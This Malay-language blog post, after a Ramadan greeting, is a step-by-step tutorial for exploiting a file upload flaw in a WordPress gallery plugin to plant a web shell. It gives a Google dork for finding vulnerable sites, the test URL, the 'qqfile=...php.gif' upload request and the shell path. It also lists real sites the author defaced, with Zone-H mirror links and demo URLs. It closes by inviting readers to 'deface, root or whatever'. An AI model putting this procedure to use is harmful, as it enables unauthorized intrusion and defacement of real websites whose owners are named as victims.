Assalamualaikum, selamat pagi. Hari nie adalah permulaan part ke-2 kita menjalani ibadah puasa yang sepertimana kita ketahui, Ramadhan terbahagi kepada 3 bahagian iaitu yang di awalnya rahmat,di tengahnya keampunan dan di akhirnya terlepas dari api neraka.
Okay, entry kali ini sy ingin kongsikan cara bagaimana hacker menggunakan exploit jenis ini yang anda boleh dapati di exploit-db. Tutorial ini sy hasilkan melalui proses pembelajaran yang berasaskan try and error. Ingin sy tegaskan bahawa entry ini adalah sebahagian proses pembelajaran sahaja.
Disini ada sy sertakan website yang mengandungi Vulnerability tersebut telah sy notify pada Zone-H
(plugin website ini telah sy buang , jadi tak perlulah cuba lagi)
http://31daystoglowinghealth.com/readme.html
[ mirror ] http://zone-h.com/mirror/id/20307795
http://lukedillon.co.za/readme.html
[ mirror ] http://zone-h.com/mirror/id/20307796
http://margotherringer.com/readme.html
[ mirror ] http://zone-h.com/mirror/id/20307797
http://www.pacificbridge.jp/apache.html
[ mirror ] http://zone-h.com/mirror/id/20304865
http://www.evidencedesign.net/readme.html
[ mirror ] http://zone-h.com/mirror/id/20307159
Langkah 1
Kita akan menggunakan browser Mozilla Firefox & Add-ons Http Requester
Langkah 2
Kenali dork yang berpatutan dengan Vulnerability ini. Dork yang sy gunakan adalah seperti ini
inurl:/wp-content/plugins/gallery-plugin/ Buat carian pada ejen carian Google @ Bing @ ikut selera anda.
Langkah 3
Test samada link itu vlun atau tidak, Cara test
http://[domain]/[path]/wp-content/plugins/gallery-plugin/upload/php.php
Sekiranya ada keluar warning sebegini {error:'No files were uploaded.'} kebarangkalian vlun.
Demo: http://www.pacificbridge.jp/mainpage/wp-content/plugins/gallery-plugin/upload/php.php
Demo 2: http://www.mymatricdance.co.za/wp-content/plugins/gallery-plugin/upload/php.php
Langkah 4
Buka Http Requester pada Tools > HttpRequester masukkan link itu dan tambahkan di hujung link itu command ini /?qqfile=nama_shell_anda.php.gif . Perhatikan print screen ini
{success:true,width:,height:}
tahniah, shell anda berjaya di upload
note: berjaya upload belum tentu ianya boleh execute jadi kita cuba sahaja
Langkah 5
Mari akses shell yang baru kuta upload sebentar tadi pada url ini
http://[domain]/[path]/wp-content/plugins/gallery-plugin/files/nama_shell_anda.php.gif
Demo: http://www.pacificbridge.jp/mainpage/wp-content/plugins/gallery-plugin/upload/files/apache.php.gif [ shell kita berjaya execute ]
Langkah 6
Sekarang terpulang pada anda, mahu deface, root atau apasahaja.
note: Sy hanyalah belajar dari kaedah try and error, jadi sekiranya ada penyalahgunaan istilah atau tersalah procedure mohon ditegur because i'am just another noob trying to help other noob. wassalam.
Post a Comment Blogger Facebook